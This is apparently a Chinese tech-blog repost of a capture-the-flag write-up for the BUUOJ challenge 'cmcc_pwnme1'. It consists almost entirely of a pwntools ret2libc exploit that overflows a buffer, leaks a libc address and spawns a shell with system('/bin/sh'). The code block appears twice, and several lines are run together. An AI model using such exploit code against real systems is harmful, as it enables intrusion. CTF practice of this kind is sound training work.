USB迷 | 专注于互联网分享

    最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。
    你的位置: 首页 > IT圈 > cmcc

    cmcc

    IT圈 admin 17浏览 0评论

    cmcc

    cmcc_pwnme1

    查看保护


    直接ret2libc吧。

    from pwn import *context(arch='i386', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj', 27421)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']r.sendlineafter('>> 6. Exit    ', '5')
p1 = b'a' * (0xa4 + 4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(p1)puts_addr = u32(r.recvuntil('\xf7')[-4:].ljust(4, b'\x00'))
success('puts_addr = ' + hex(puts_addr))libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()r.sendlineafter('>> 6. Exit    ', '5')
p2 = b'a' * (0xa4 + 4) + p32(system_addr) +  p32(0) + p32(bin_sh)
r.sendline(p2)r.interactive()

    cmcc

    cmcc_pwnme1

    查看保护


    直接ret2libc吧。

    from pwn import *context(arch='i386', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj', 27421)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']r.sendlineafter('>> 6. Exit    ', '5')
p1 = b'a' * (0xa4 + 4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(p1)puts_addr = u32(r.recvuntil('\xf7')[-4:].ljust(4, b'\x00'))
success('puts_addr = ' + hex(puts_addr))libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()r.sendlineafter('>> 6. Exit    ', '5')
p2 = b'a' * (0xa4 + 4) + p32(system_addr) +  p32(0) + p32(bin_sh)
r.sendline(p2)r.interactive()
    继续浏览有关 的文章

    与本文相关的文章

    发布评论

    评论列表 (0)

    1. 暂无评论